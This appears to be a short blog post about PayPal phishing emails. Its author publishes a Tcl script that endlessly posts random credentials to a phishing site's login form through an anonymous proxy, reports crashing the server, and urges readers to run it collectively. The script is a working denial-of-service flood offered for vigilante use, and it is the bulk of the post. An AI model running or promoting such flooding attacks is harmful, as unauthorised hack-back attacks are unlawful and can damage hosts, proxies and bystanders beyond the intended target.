Killing fake Paypal emails (identity thefts)

I was getting spammed by fake Paypal emails that looks like this. It looks original (these culprits hotlink the images to real paypal site). However, when you view the source, you will notice that the link that says “Click here to verify your account” leads to their fake site that collects user name and password. The url keeps changing with many emails. It looks like “http://spport-cgi.com/login.html” or “http://veri-sign-cgi.com/cgi-bin/login.html”

I decided to go on the offensive and fry their database/server. The login page is quite simple. It has a single form asking for user name and password. Armed with Tcl, I wrote the following simple script that continuously sends random user name/password to the server.

package require http
proc getRand {} { return [expr int(rand()*100000)] }

::http::config -proxyhost "200.79.80.169" -proxyport 80
while { true } {
    set token [::http::geturl "http://spport-cgi.com/login.php" \
        -query [::http::formatQuery login user[getRand] password pass[getRand]]]

    puts "status: [::http::ncode $token]"
}

I connected through an anonymous proxy to post the requests. Within a few attempts, their server stopped responding! If you receive these kind of spams and have Tcl/Tk installed, I urge you to give the above script a try and let us collectively fry the servers of these evil people.

Leave a Reply